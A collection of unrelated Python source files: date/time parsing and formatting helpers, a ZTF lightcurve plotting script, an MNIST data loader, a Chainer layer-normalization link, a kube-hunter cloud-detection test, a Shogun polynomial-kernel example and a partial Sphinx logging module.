hour = parse_result.get("hour12")
if hour is None:
hour = 0
else:
# Do we have am or pm?
if hour == 12:
hour = 0
if parse_result.get("ampm", "AM") == "PM":
hour += 12
# Minute
minute = parse_result.get("minute") or 0
# Second
second = parse_result.get("second") or 0
return (year, month, day, hour, minute, second)
# -------------------------------------------------------------------------
@staticmethod
def _parse_int(s, l, tokens):
""" Parser helper to convert a token into an integer number """
try:
return int(tokens[0])
except (TypeError, ValueError):
return None
# -------------------------------------------------------------------------
def _get_rules(self):
"""
Generate the general pyparsing rules for this calendar
Returns:
the rules dict
rules = {"d": Day of the month as a zero-padded decimal number
"b": Month as locale’s abbreviated name
"B": Month as locale’s full name
"m": Month as a zero-padded decimal number
"y": Year without century as a zero-padded decimal number
"Y": Year with century as a decimal number
"H": Hour (24-hour clock) as a zero-padded decimal number
"I": Hour (12-hour clock) as a zero-padded decimal number
"p": Locale’s equivalent of either AM or PM
"M": Minute as a zero-padded decimal number
"S": Second as a zero-padded decimal number
}
TODO support day-of-week options (recognize but suppress when parsing)
"""
import pyparsing as pp
T = current.T
calendar = self.calendar
oneOf = pp.oneOf
parse_int = self._parse_int
def numeric(minimum, maximum):
""" Helper to define rules for zero-padded numeric values """
zp = " ".join("%02d" % i \
for i in range(minimum, min(10, maximum + 1)))
np = " ".join("%d" % i \
for i in range(minimum, maximum + 1))
return (oneOf(zp) ^ oneOf(np)).setParseAction(parse_int)
# Day
month_days = calendar.MONTH_DAYS
days = [(max(d) if isinstance(d, tuple) else d) for d in month_days]
day = numeric(1, max(days)).setResultsName("day")
# Month
CaselessLiteral = pp.CaselessLiteral
replaceWith = pp.replaceWith
# ...numeric
num_months = len(calendar.MONTH_NAME)
month = numeric(1, num_months).setResultsName("month")
# ...name
expr = None
for i, m in enumerate(calendar.MONTH_NAME):
month_number = str(i+1)
month_literal = CaselessLiteral(m)
month_t = str(T(m))
if month_t != m:
month_literal |= CaselessLiteral(month_t)
month_literal.setParseAction(replaceWith(month_number))
expr = (expr | month_literal) if expr else month_literal
month_name = expr.setParseAction(parse_int).setResultsName("month")
# ...abbreviation
expr = None
for i, m in enumerate(calendar.MONTH_ABBR):
month_number = str(i+1)
month_literal = CaselessLiteral(m)
month_t = str(T(m))
if month_t != m:
month_literal |= CaselessLiteral(month_t)
month_literal.setParseAction(replaceWith(month_number))
expr = (expr | month_literal) if expr else month_literal
month_abbr = expr.setParseAction(parse_int).setResultsName("month")
# Year
Word = pp.Word
nums = pp.nums
# ...without century
year2 = Word(nums, min=1, max=2)
year2 = year2.setParseAction(parse_int).setResultsName("year2")
# ...with century
year4 = Word(nums, min=1, max=4)
year4 = year4.setParseAction(parse_int).setResultsName("year4")
# Hour
hour24 = numeric(0, 23).setResultsName("hour24")
hour12 = numeric(0, 12).setResultsName("hour12")
# Minute
minute = numeric(0, 59).setResultsName("minute")
# Second
second = numeric(0, 59).setResultsName("second")
# AM/PM
am = ("AM", str(T("AM")), "am", str(T("am")))
am = oneOf(" ".join(am)).setParseAction(pp.replaceWith("AM"))
pm = ("PM", str(T("PM")), "pm", str(T("pm")))
pm = oneOf(" ".join(pm)).setParseAction(pp.replaceWith("PM"))
ampm = (am ^ pm).setResultsName("ampm")
rules = {"d": day,
"b": month_abbr,
"B": month_name,
"m": month,
"y": year2,
"Y": year4,
"H": hour24,
"I": hour12,
"p": ampm,
"M": minute,
"S": second,
}
return rules
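    # -------------------------------------------------------------------------
    # Illustration (hypothetical, standalone): set_format() above maps %-directives
    # to pyparsing elements and joins them with suppressed literals for the text in
    # between. A minimal hand-built grammar for a "%Y-%m-%d"-style format:
def _demo_ymd_grammar(string="2077-09-15"):
    """ Parse a dash-separated date string with a small pyparsing grammar """
    import pyparsing as pp
    to_int = lambda s, l, tokens: int(tokens[0])
    year = pp.Word(pp.nums, min=1, max=4).setParseAction(to_int).setResultsName("year")
    month = pp.Word(pp.nums, min=1, max=2).setParseAction(to_int).setResultsName("month")
    day = pp.Word(pp.nums, min=1, max=2).setParseAction(to_int).setResultsName("day")
    dash = pp.Suppress(pp.Literal("-"))
    grammar = year + dash + month + dash + day
    result = grammar.parseString(string)
    return (result.get("year"), result.get("month"), result.get("day"))
# e.g. _demo_ymd_grammar("2077-09-15") returns (2077, 9, 15)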
# =============================================================================
class S3DateTimeFormatter:
""" Date/Time Formatter for non-Gregorian calendars """
def __init__(self, calendar):
"""
Args:
calendar: the calendar
"""
# Get the effective calendar
if not calendar:
raise TypeError("Invalid calendar: %s (%s)" % (calendar, type(calendar)))
self.calendar = calendar.calendar
# -------------------------------------------------------------------------
def render(self, timetuple, dtfmt):
"""
Render a timetuple as string according to the given format
Args:
timetuple: the timetuple (y, m, d, hh, mm, ss)
dtfmt: the date/time format (string)
TODO support day-of-week options
"""
y, m, d, hh, mm, ss = timetuple
T = current.T
calendar = self.calendar
rules = {"d": "%02d" % d,
"b": T(calendar.MONTH_ABBR[m - 1]),
"B": T(calendar.MONTH_NAME[m - 1]),
"m": "%02d" % m,
"y": "%02d" % (y % 100),
"Y": "%04d" % y,
"H": "%02d" % hh,
"I": "%02d" % ((hh % 12) or 12),
"p": T("AM") if hh < 12 else T("PM"),
"M": "%02d" % mm,
"S": "%02d" % ss,
}
# Interpret the format
result = []
sequence = []
def close(s):
s = "".join(s)
if s:
result.append(s)
from .convert import s3_str
rule = False
for c in s3_str(dtfmt):
if rule and c in rules:
# Close previous sequence
sequence.pop()
close(sequence)
# Append control rule
result.append(s3_str(rules[c]))
# Start new sequence
sequence = []
# Close rule
rule = False
continue
if c == "%" and not rule:
rule = True
else:
rule = False
sequence.append(c)
if sequence:
close(sequence)
return "".join(result)
# =============================================================================
# Date/Time Parser and Formatter (@todo: integrate with S3Calendar)
#
def s3_parse_datetime(string, dtfmt=None):
"""
Parse a date/time string according to the given format.
Args:
string: the string
dtfmt: the string format (defaults to ISOFORMAT)
Returns:
a datetime object, or None if the string is invalid
"""
if not string:
return None
if dtfmt is None:
dtfmt = ISOFORMAT
try:
(y, m, d, hh, mm, ss) = time.strptime(string, dtfmt)[:6]
dt = datetime.datetime(y, m, d, hh, mm, ss)
except ValueError:
dt = None
return dt
#--------------------------------------------------------------------------
def s3_format_datetime(dt=None, dtfmt=None):
"""
Format a datetime object according to the given format.
Args:
dt: the datetime object, defaults to datetime.datetime.utcnow()
dtfmt: the string format (defaults to ISOFORMAT)
Returns:
a string
"""
if not dt:
dt = datetime.datetime.utcnow()
if dtfmt is None:
dtfmt = ISOFORMAT
return dt.strftime(dtfmt)
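# Hypothetical usage (ISOFORMAT is the module-level default format defined
# elsewhere in this file):
#
#   s = s3_format_datetime()              # current UTC time as a string
#   dt = s3_parse_datetime(s)             # parses back to a datetime
#   s3_parse_datetime("not a date")       # -> None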
# =============================================================================
# ISO-8601 Format Date/Time
#
def s3_decode_iso_datetime(dtstr):
"""
Convert date/time string in ISO-8601 format into a datetime object
Args:
dtstr: the date/time string
Returns:
a timezone-aware datetime.datetime object
Raises:
ValueError: if the string cannot be parsed
Note:
This has "iso" in its name for consistency reasons, but can actually
read a variety of formats
"""
# Default seconds/microseconds=zero
DEFAULT = datetime.datetime.utcnow().replace(hour = 8,
minute = 0,
second = 0,
microsecond = 0,
)
try:
dt = dateutil.parser.parse(dtstr, default=DEFAULT)
except (AttributeError, TypeError, ValueError):
raise ValueError("Invalid date/time string: %s (%s)" % (dtstr, type(dtstr)))
if dt.tzinfo is None:
dt = dt.replace(tzinfo=dateutil.tz.tzutc())
return dt
#--------------------------------------------------------------------------
def s3_encode_iso_datetime(dt):
"""
Convert a datetime object into a ISO-8601 formatted
string, omitting microseconds
Args:
dt: the datetime object
"""
if isinstance(dt, (datetime.datetime, datetime.time)):
dx = dt.replace(microsecond=0)
else:
dx = dt
return dx.isoformat()
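# Hypothetical usage (dateutil does the actual parsing, so many notations are
# accepted, not just strict ISO-8601):
#
#   dt = s3_decode_iso_datetime("2011-11-19T14:00:00+05:30")
#   dt.tzinfo is not None                 # -> True, the result is always tz-aware
#   s3_encode_iso_datetime(dt)            # -> "2011-11-19T14:00:00+05:30"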
# =============================================================================
# Time Zone Handling
#
def s3_utc(dt):
"""
Get a datetime object for the same date/time as the
datetime object, but in UTC
Args:
dt: the datetime object
"""
if dt:
if dt.tzinfo is None:
return dt.replace(tzinfo=dateutil.tz.tzutc())
return dt.astimezone(dateutil.tz.tzutc())
else:
return None
#--------------------------------------------------------------------------
class S3DefaultTZ(datetime.tzinfo):
"""
A datetime.tzinfo class that can be instantiated from
a UTC offset string or integer hours, used for testing and
as fallback for s3_get_tzinfo if the client's timezone cannot
be determined but an offset is available
"""
def __init__(self, offset=None):
super(S3DefaultTZ, self).__init__()
if offset:
offset_sec = S3DateTime.get_offset_value(offset)
self._offset = datetime.timedelta(seconds=offset_sec)
else:
self._offset = datetime.timedelta(0)
def utcoffset(self, dt):
return self._offset
def dst(self, dt):
return datetime.timedelta(0)
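# Hypothetical usage (the class docstring above says the offset may be given as
# integer hours; the exact accepted notations depend on
# S3DateTime.get_offset_value):
#
#   tz = S3DefaultTZ(5)
#   datetime.datetime(2021, 5, 3, 12, 0, tzinfo=tz).utcoffset()
#   # -> a fixed offset of +5 hours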
#--------------------------------------------------------------------------
def s3_get_tzinfo():
"""
Get a datetime.tzinfo object for the client's timezone
"""
response = current.response
tzinfo = response.s3.tzinfo
if tzinfo is None:
session = current.session
# 1st choice: use the _timezone parameter from the current form
try:
tzname = current.request.post_vars.get("_timezone")
except (ValueError, TypeError):
tzname = None
if tzname:
session.s3.tzname = tzname
else:
# Fall back to the previous _timezone of the same session
tzname = session.s3.tzname
if tzname:
tzinfo = dateutil.tz.gettz(tzname)
# 2nd choice: use the _utc_offset parameter from the current form
# (e.g. client not supporting Intl)
if not tzinfo:
offset = S3DateTime.get_utc_offset()
if offset:
tzinfo = S3DefaultTZ(offset=offset)
# 3rd choice: use the timezone specified in deployment settings
if not tzinfo:
tzname = current.deployment_settings.get_L10n_timezone()
if tzname:
tzinfo = dateutil.tz.gettz(tzname)
if tzinfo:
response.s3.tzinfo = tzinfo
# No further fallback, treat as UTC
return tzinfo
# =============================================================================
# Utilities
#
def s3_relative_datetime(dtexpr):
"""
Return an absolute datetime for a relative date/time expression
Args:
dtexpr: the relative date/time expression, syntax:
"[+|-][numeric][Y|M|D|h|m|s]", e.g.
"+12M" = twelve months from now,
additionally recognizes the string "NOW"
Returns:
datetime.datetime (UTC), or None if dtexpr is invalid
"""
if dtexpr:
dtexpr = dtexpr.strip()
now = current.request.utcnow
if dtexpr.lower() == "now":
return now
elif dtexpr[0] not in "+-":
return None
else:
return None
from dateutil.relativedelta import relativedelta
timedelta = datetime.timedelta
f = 1
valid = False
then = now
for m in RELATIVE.finditer(dtexpr):
(sign, value, unit) = m.group(1, 2, 3)
try:
value = int(value)
except ValueError:
continue
if sign == "-":
f = -1
elif sign == "+":
f = 1
if unit == "Y":
then += relativedelta(years = f * value)
elif unit == "M":
then += relativedelta(months = f * value)
else:
then += timedelta(seconds = f * value * SECONDS[unit])
valid = True
return then if valid else None
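# -----------------------------------------------------------------------------
# Illustration (hypothetical, standalone): RELATIVE and SECONDS are module-level
# constants defined elsewhere in this file. A self-contained version of the same
# "[+|-]<number><unit>" idea, restricted to day/hour/minute/second units:
def _demo_relative_seconds(dtexpr):
    """ Return the signed offset in seconds for simple D/h/m/s expressions """
    import re
    units = {"D": 86400, "h": 3600, "m": 60, "s": 1}
    total, valid = 0, False
    for sign, value, unit in re.findall(r"([+-])(\d+)([Dhms])", dtexpr):
        total += (-1 if sign == "-" else 1) * int(value) * units[unit]
        valid = True
    return total if valid else None
# e.g. _demo_relative_seconds("+2D") returns 172800,
#      _demo_relative_seconds("-30m") returns -1800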
# END =========================================================================
|
the-stack_106_19004
|
#!/usr/bin/env python3
# Author: Simeon Reusch ([email protected])
# License: BSD-3-Clause
import os, time, sys, logging
import numpy as np
import pandas as pd
from astropy.time import Time
from astropy.table import Table
from astropy.io import fits
import matplotlib.pyplot as plt
from datetime import datetime, date
from ztffps import pipeline, database
from ztffps.utils import calculate_magnitudes, abmag_err_to_flux_err, abmag_to_flux
def plot_lightcurve(
name,
snt=5.0,
daysago=None,
daysuntil=None,
mag_range=None,
flux_range=None,
logger=None,
plot_flux=False,
):
""" """
if logger is None:
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
### define directories
lc_path = os.path.join(pipeline.FORCEPHOTODATA, f"{name}.csv")
lc_plotdir = pipeline.PLOTDATA
lc_plotted_dir = pipeline.PLOT_DATAFRAMES
lc = pd.read_csv(lc_path)
query = database.read_database(name)
has_alertdata = False
if query["jdobs_alert"][0] is not None:
has_alertdata = True
alert_jd = query["jdobs_alert"][0]
alert_mag = query["mag_alert"][0]
alert_magerr = query["magerr_alert"][0]
alert_fid = query["fid_alert"][0]
alert_zp = query["magzp_alert"][0]
alert_zp_err = query["magzp_err_alert"][0]
alert_mjd = np.asarray(alert_jd) - 2400000.5
# Cut values where magzp is NaN as no flux can be extracted
alert_fid = np.asarray(alert_fid, dtype=int)
alert_mjd = np.asarray(alert_mjd, dtype=float)
alert_mag = np.asarray(alert_mag, dtype=float)
alert_mag_err = np.asarray(alert_magerr, dtype=float)
alert_zp = np.asarray(alert_zp, dtype=float)
alert_zp_err = np.asarray(alert_zp_err, dtype=float)
alert_zp = np.ma.masked_invalid(alert_zp)
mask = np.ma.getmask(alert_zp)
alert_zp = np.ma.compressed(alert_zp)
alert_zp_err = np.ma.compressed(np.ma.masked_where(mask, alert_zp_err))
alert_mjd = np.ma.compressed(np.ma.masked_where(mask, alert_mjd))
alert_mag = np.ma.compressed(np.ma.masked_where(mask, alert_mag))
alert_magerr = np.ma.compressed(np.ma.masked_where(mask, alert_magerr))
alert_fid = np.ma.compressed(np.ma.masked_where(mask, alert_fid))
# and now we calculate the flux
alert_flux = abmag_to_flux(alert_mag, alert_zp)
alert_flux_err = abmag_err_to_flux_err(
alert_mag, alert_magerr, alert_zp, alert_zp_err
)
### apply time-range cut:
now = Time(time.time(), format="unix", scale="utc").mjd
# bla = Time("2020-01-09", format="iso", scale="utc").mjd
mjdmin = now - daysago if daysago is not None else 58208.5
mjdmax = now - daysuntil if daysuntil is not None else now
if daysuntil is None and daysago is None:
axis_min = mjdmin
axis_max = now + 10
else:
axis_min = mjdmin
axis_max = mjdmax + 1
### remove rows outside the timerange and with bad chisq-values, reset index
lc.query("obsmjd >= @mjdmin and obsmjd <= @mjdmax", inplace=True)
lc.query("chi2 > 0", inplace=True)
lc = lc.reset_index()
del lc["index"]
lc = calculate_magnitudes(lc, snt)
lc.sort_values(by=["obsmjd"], inplace=True)
lc.reset_index(inplace=True)
lc.drop(columns=["index"], inplace=True)
# Save this version of the dataframe for later analysis (and to be sent by mail)
lc.to_csv(os.path.join(lc_plotted_dir, f"{name}_SNT_{snt}.csv"))
    # Create Dataframe for Alert data / Rounding is necessary because Alert and Forced Photometry MJDs are not consistent
if has_alertdata:
alert_df = pd.DataFrame(
data={
"obsmjd": np.around(alert_mjd, decimals=4),
"filter_id": alert_fid,
"flux": alert_flux,
"flux_err": alert_flux_err,
"mag": alert_mag,
"mag_err": alert_magerr,
"magzp": alert_zp,
"magzp_err": alert_zp_err,
}
)
alert_df = alert_df[
~alert_df["obsmjd"].isin(np.around(lc.obsmjd.values, decimals=4))
]
alert_df = alert_df.reset_index()
alert_df.drop(columns=["index"], inplace=True)
alert_df.to_csv(os.path.join(lc_plotted_dir, f"{name}_alert.csv"))
alert_g = alert_df.query("filter_id == 1")
alert_r = alert_df.query("filter_id == 2")
alert_i = alert_df.query("filter_id == 3")
# Create filterspecific dataframes
len_before_sn_cut = len(lc)
t0_dist = np.asarray(lc.obsmjd.values - now)
lc.insert(2, "t0_dist", t0_dist)
uplim = lc.query("mag == 99")
lc_full = lc.copy()
lc = lc.query("mag < 99")
len_after_sn_cut = len(lc)
filterlist = [["ZTF g", "ZTF_g"], ["ZTF r", "ZTF_r"], ["ZTF i", "ZTF_i"]]
if not plot_flux:
g = lc[lc["filter"].isin(filterlist[0])]
r = lc[lc["filter"].isin(filterlist[1])]
i = lc[lc["filter"].isin(filterlist[2])]
g_uplim = uplim[uplim["filter"].isin(filterlist[0])]
r_uplim = uplim[uplim["filter"].isin(filterlist[1])]
i_uplim = uplim[uplim["filter"].isin(filterlist[2])]
else:
g = lc_full[lc_full["filter"].isin(filterlist[0])]
r = lc_full[lc_full["filter"].isin(filterlist[1])]
i = lc_full[lc_full["filter"].isin(filterlist[2])]
logger.info(
f"{name} {len_after_sn_cut} of {len_before_sn_cut} datapoints survived SNT cut of {snt}"
)
### define functions for secondary axis (conversion from jd --> distance to today)
def t0_dist(obsmjd):
""" """
t0 = Time(time.time(), format="unix", scale="utc").mjd
return obsmjd - t0
def t0_to_mjd(dist_to_t0):
""" """
t0 = Time(time.time(), format="unix", scale="utc").mjd
return t0 + dist_to_t0
### actual plotting
fig, ax = plt.subplots(1, 1, figsize=[10, 4.2])
fig.subplots_adjust(top=0.8)
ax2 = ax.secondary_xaxis("top", functions=(t0_dist, t0_to_mjd))
# Get time now as UTC time
ts = time.time()
utc_now = datetime.utcfromtimestamp(ts)
utc_string = utc_now.strftime("%Y-%m-%d %H:%M")
ax2.set_xlabel(f"Days from {utc_string} UT")
fig.suptitle(f"{name}", fontweight="bold")
ax.grid(b=True, axis="y")
ax.set_xlabel("MJD")
if not plot_flux:
ax.set_ylabel("Magnitude [AB]")
else:
ax.set_ylabel("Flux")
ax.set_xlim([axis_min, axis_max])
ax2.set_xlim([ax.get_xlim()[0] - now, ax.get_xlim()[1] - now])
bands = ["g", "r", "i"]
plot_colors = {"g": "green", "r": "red", "i": "orange"}
plot_labels = {"g": "FP g", "r": "FP r", "i": "FP i"}
plot_labels_alert = {"g": "Alert g", "r": "Alert r", "i": "Alert i"}
colors = ["green", "red", "orange"]
if not plot_flux:
upper_limit_dfs = {"g": g_uplim, "r": r_uplim, "i": i_uplim}
mag_dfs = {"g": g, "r": r, "i": i}
for band in upper_limit_dfs.keys():
ax.scatter(
upper_limit_dfs[band].obsmjd.values,
upper_limit_dfs[band].upper_limit.values,
color=plot_colors[band],
marker="v",
s=1.3,
alpha=0.5,
)
for band in mag_dfs.keys():
ax.errorbar(
mag_dfs[band].obsmjd.values,
mag_dfs[band].mag.values,
mag_dfs[band].mag_err.values,
color=plot_colors[band],
fmt=".",
label=plot_labels[band],
mec="black",
mew=0.5,
)
if has_alertdata:
alert_dfs = {"g": alert_g, "r": alert_r, "i": alert_i}
for band in alert_dfs.keys():
ax.errorbar(
alert_dfs[band].obsmjd.values,
alert_dfs[band].mag.values,
alert_dfs[band].mag_err.values,
color=plot_colors[band],
fmt=".",
label=plot_labels_alert[band],
mew=0,
)
else:
flux_dfs = {"g": g, "r": r, "i": i}
for band in flux_dfs.keys():
ax.errorbar(
flux_dfs[band].obsmjd.values,
flux_dfs[band].ampl.values,
flux_dfs[band]["ampl.err"].values,
color=plot_colors[band],
fmt=".",
label=plot_labels[band],
mec="black",
mew=0.5,
)
if has_alertdata:
alert_dfs = {"g": alert_g, "r": alert_r, "i": alert_i}
for band in alert_dfs.keys():
ax.errorbar(
alert_dfs[band].obsmjd.values,
alert_dfs[band].flux.values,
alert_dfs[band].flux_err.values,
color=plot_colors[band],
fmt=".",
label=plot_labels_alert[band],
mew=0,
)
ax.axvline(x=now, color="grey", linewidth=0.5, linestyle="--")
if not plot_flux:
if mag_range is None:
ax.set_ylim([23, 15])
else:
ax.set_ylim([np.max(mag_range), np.min(mag_range)])
else:
if flux_range is not None:
ax.set_ylim([np.min(flux_range), np.max(flux_range)])
if not plot_flux:
ax.legend(
loc=0,
framealpha=1,
title=f"SNT={snt:.0f}",
fontsize="x-small",
title_fontsize="x-small",
)
else:
ax.legend(
loc=0, framealpha=1, fontsize="x-small", title_fontsize="x-small",
)
images_dir = os.path.join(lc_plotdir, "images")
if not os.path.exists(images_dir):
os.makedirs(images_dir)
if not plot_flux:
image_path = os.path.join(images_dir, f"{name}_SNT_{snt}.png")
else:
image_path = os.path.join(images_dir, f"{name}_flux.png")
fig.savefig(image_path, dpi=300, bbox_inches="tight")
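# ------------------------------------------------------------------------------
# Hypothetical usage (assumes the ztffps pipeline directories and a database entry
# for the object exist; the ZTF name below is only a placeholder):
#
#   plot_lightcurve("ZTF19abcdefg", snt=5.0, daysago=90, plot_flux=False)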
|
the-stack_106_19006
|
"""
mnist_loader
~~~~~~~~~~~~
A library to load the MNIST image data. For details of the data
structures that are returned, see the doc strings for ``load_data``
and ``load_data_wrapper``. In practice, ``load_data_wrapper`` is the
function usually called by our neural network code.
"""
#### Libraries
# Standard library
import _pickle as cPickle
import gzip
# Third-party libraries
import numpy as np
def load_data():
"""Return the MNIST data as a tuple containing the training data,
the validation data, and the test data.
The ``training_data`` is returned as a tuple with two entries.
The first entry contains the actual training images. This is a
numpy ndarray with 50,000 entries. Each entry is, in turn, a
numpy ndarray with 784 values, representing the 28 * 28 = 784
pixels in a single MNIST image.
The second entry in the ``training_data`` tuple is a numpy ndarray
containing 50,000 entries. Those entries are just the digit
values (0...9) for the corresponding images contained in the first
entry of the tuple.
The ``validation_data`` and ``test_data`` are similar, except
each contains only 10,000 images.
This is a nice data format, but for use in neural networks it's
helpful to modify the format of the ``training_data`` a little.
That's done in the wrapper function ``load_data_wrapper()``, see
below.
"""
f = gzip.open('../data/mnist.pkl.gz', 'rb')
training_data, validation_data, test_data = cPickle.load(f, encoding='latin1')
f.close()
return (training_data, validation_data, test_data)
def load_data_wrapper():
"""Return a tuple containing ``(training_data, validation_data,
test_data)``. Based on ``load_data``, but the format is more
convenient for use in our implementation of neural networks.
In particular, ``training_data`` is a list containing 50,000
2-tuples ``(x, y)``. ``x`` is a 784-dimensional numpy.ndarray
containing the input image. ``y`` is a 10-dimensional
numpy.ndarray representing the unit vector corresponding to the
correct digit for ``x``.
``validation_data`` and ``test_data`` are lists containing 10,000
2-tuples ``(x, y)``. In each case, ``x`` is a 784-dimensional
    numpy.ndarray containing the input image, and ``y`` is the
corresponding classification, i.e., the digit values (integers)
corresponding to ``x``.
Obviously, this means we're using slightly different formats for
the training data and the validation / test data. These formats
turn out to be the most convenient for use in our neural network
code."""
tr_d, va_d, te_d = load_data()
training_inputs = [np.reshape(x, (784, 1)) for x in tr_d[0]]
training_results = [vectorized_result(y) for y in tr_d[1]]
training_data = list(zip(training_inputs, training_results))
validation_inputs = [np.reshape(x, (784, 1)) for x in va_d[0]]
validation_data = list(zip(validation_inputs, va_d[1]))
test_inputs = [np.reshape(x, (784, 1)) for x in te_d[0]]
test_data = list(zip(test_inputs, te_d[1]))
return (training_data, validation_data, test_data)
def vectorized_result(j):
"""Return a 10-dimensional unit vector with a 1.0 in the jth
position and zeroes elsewhere. This is used to convert a digit
(0...9) into a corresponding desired output from the neural
network."""
e = np.zeros((10, 1))
e[j] = 1.0
return e
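# Hypothetical usage (assumes ../data/mnist.pkl.gz exists relative to the
# working directory, as load_data() expects):
#
#   training_data, validation_data, test_data = load_data_wrapper()
#   x, y = training_data[0]
#   x.shape, y.shape                  # ((784, 1), (10, 1))
#   vectorized_result(3).argmax()     # 3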
|
the-stack_106_19007
|
from chainer.functions.normalization import layer_normalization
from chainer import link
from chainer import utils
from chainer import variable
class LayerNormalization(link.Link):
"""Layer normalization layer on outputs of linear functions.
.. warning::
This feature is experimental. The interface can change in the future.
This link implements a "layer normalization" layer
which normalizes the input units by statistics
that are computed along the second axis,
scales and shifts them.
Parameter initialization will be deferred until
the first forward data pass at which time the size will be determined.
Args:
size (int): Size of input units. If ``None``, parameter initialization
will be deferred until the first forward data pass at which time
the size will be determined.
eps (float): Epsilon value for numerical stability of normalization.
initial_gamma (~chainer.Initializer): Initializer for scaling vector.
If ``None``, then the vector is filled by 1.
If a scalar, the vector is filled by it.
If ``numpy.ndarray``, the vector is set by it.
initial_beta (~chainer.Initializer): Initializer for shifting vector.
If ``None``, then the vector is filled by 0.
If a scalar, the vector is filled by it.
If ``numpy.ndarray``, the vector is set by it.
Attributes:
gamma (~chainer.Parameter): Scaling parameter.
beta (~chainer.Parameter): Shifting parameter.
eps (float): Epsilon value for numerical stability.
See: `Layer Normalization <https://arxiv.org/abs/1607.06450>`_
"""
def __init__(self, size=None, eps=1e-6, initial_gamma=None,
initial_beta=None):
super(LayerNormalization, self).__init__()
if initial_gamma is None:
initial_gamma = 1
if initial_beta is None:
initial_beta = 0
with self.init_scope():
self.gamma = variable.Parameter(initial_gamma)
self.beta = variable.Parameter(initial_beta)
self.eps = eps
if size is not None:
self._initialize_params(size)
def _initialize_params(self, size):
self.gamma.initialize(size)
self.beta.initialize(size)
def forward(self, x):
"""Apply layer normalization to given input.
Args:
x (~chainer.Variable): Batch vectors.
Shape of this value must be `(batch_size, unit_size)`,
e.g., the output of :func:`~chainer.functions.linear`.
Returns:
~chainer.Variable: Output of the layer normalization.
"""
if self.gamma.data is None:
in_size = utils.size_of_shape(x.shape[1:])
self._initialize_params(in_size)
return layer_normalization.layer_normalization(
x, self.gamma, self.beta, self.eps)
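# Minimal usage sketch (assumes chainer >= 5 and numpy; the parameter size is
# inferred from the first batch passed through the link):
#
#   import numpy as np
#   layer = LayerNormalization()
#   x = np.random.rand(8, 32).astype(np.float32)
#   y = layer(x)    # gamma and beta are initialized with size 32 on this call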
|
the-stack_106_19008
|
import requests_mock
import json
from kube_hunter.conf import Config, set_config
from kube_hunter.core.events.types import NewHostEvent
set_config(Config())
def test_presetcloud():
"""Testing if it doesn't try to run get_cloud if the cloud type is already set.
    get_cloud(1.2.3.4) would result in an error
"""
    expected = "AWS"
    hostEvent = NewHostEvent(host="1.2.3.4", cloud=expected)
    assert expected == hostEvent.cloud
def test_getcloud():
fake_host = "1.2.3.4"
expected_cloud = "Azure"
result = {"cloud": expected_cloud}
with requests_mock.mock() as m:
m.get(f"https://api.azurespeed.com/api/region?ipOrUrl={fake_host}", text=json.dumps(result))
hostEvent = NewHostEvent(host=fake_host)
assert hostEvent.cloud == expected_cloud
|
the-stack_106_19009
|
#!/usr/bin/env python
traindat = '../data/fm_train_real.dat'
testdat = '../data/fm_test_real.dat'
parameter_list = [[traindat,testdat,4,0.0,True],[traindat,testdat,5,0.0,True]]
def kernel_poly (train_fname=traindat,test_fname=testdat,degree=4,c=0.0,
use_normalization=True):
from shogun import RealFeatures, PolyKernel, CSVFile
feats_train=RealFeatures(CSVFile(train_fname))
feats_test=RealFeatures(CSVFile(test_fname))
kernel=PolyKernel(
feats_train, feats_train, degree, c, use_normalization)
km_train=kernel.get_kernel_matrix()
kernel.init(feats_train, feats_test)
km_test=kernel.get_kernel_matrix()
return km_train,km_test,kernel
if __name__=='__main__':
print('Poly')
kernel_poly (*parameter_list[0])
|
the-stack_106_19012
|
# -*- coding: utf-8 -*-
"""
sphinx.util.logging
~~~~~~~~~~~~~~~~~~~
Logging utility functions for Sphinx.
:copyright: Copyright 2007-2017 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from __future__ import absolute_import
import logging
import logging.handlers
from contextlib import contextmanager
from collections import defaultdict
from six import PY2, StringIO
from docutils import nodes
from docutils.utils import get_source_line
from sphinx.errors import SphinxWarning
from sphinx.util.console import colorize
if False:
# For type annotation
from typing import Any, Dict, Generator, IO, List, Tuple, Union # NOQA
from docutils import nodes # NOQA
from sphinx.application import Sphinx # NOQA
VERBOSE = 15
LEVEL_NAMES = defaultdict(lambda: logging.WARNING) # type: Dict[str, int]
LEVEL_NAMES.update({
'CRITICAL': logging.CRITICAL,
'SEVERE': logging.CRITICAL,
'ERROR': logging.ERROR,
'WARNING': logging.WARNING,
'INFO': logging.INFO,
'VERBOSE': VERBOSE,
'DEBUG': logging.DEBUG,
})
VERBOSITY_MAP = defaultdict(lambda: 0) # type: Dict[int, int]
VERBOSITY_MAP.update({
0: logging.INFO,
1: VERBOSE,
2: logging.DEBUG,
})
COLOR_MAP = defaultdict(lambda: 'blue') # type: Dict[int, unicode]
COLOR_MAP.update({
logging.ERROR: 'darkred',
logging.WARNING: 'darkred',
logging.DEBUG: 'darkgray',
})
def getLogger(name):
# type: (str) -> SphinxLoggerAdapter
"""Get logger wrapped by SphinxLoggerAdapter."""
return SphinxLoggerAdapter(logging.getLogger(name), {})
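# Typical usage in Sphinx code (the extra ``type``/``subtype``/``location``
# keywords are handled by SphinxLoggerAdapter.process() below):
#
#   logger = getLogger(__name__)
#   logger.warning('duplicate label', type='myext', location=(docname, lineno))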
def convert_serializable(records):
# type: (List[logging.LogRecord]) -> None
"""Convert LogRecord serializable."""
for r in records:
# extract arguments to a message and clear them
r.msg = r.getMessage()
r.args = ()
class SphinxWarningLogRecord(logging.LogRecord):
"""Log record class supporting location"""
location = None # type: Any
def getMessage(self):
# type: () -> str
message = super(SphinxWarningLogRecord, self).getMessage()
location = getattr(self, 'location', None)
if location:
message = '%s: WARNING: %s' % (location, message)
elif 'WARNING:' not in message:
message = 'WARNING: %s' % message
return message
class SphinxLoggerAdapter(logging.LoggerAdapter):
"""LoggerAdapter allowing ``type`` and ``subtype`` keywords."""
def log(self, level, msg, *args, **kwargs): # type: ignore
# type: (Union[int, str], unicode, Any, Any) -> None
if isinstance(level, int):
super(SphinxLoggerAdapter, self).log(level, msg, *args, **kwargs)
else:
levelno = LEVEL_NAMES[level]
super(SphinxLoggerAdapter, self).log(levelno, msg, *args, **kwargs)
def verbose(self, msg, *args, **kwargs):
# type: (unicode, Any, Any) -> None
self.log(VERBOSE, msg, *args, **kwargs)
def process(self, msg, kwargs): # type: ignore
# type: (unicode, Dict) -> Tuple[unicode, Dict]
extra = kwargs.setdefault('extra', {})
if 'type' in kwargs:
extra['type'] = kwargs.pop('type')
if 'subtype' in kwargs:
extra['subtype'] = kwargs.pop('subtype')
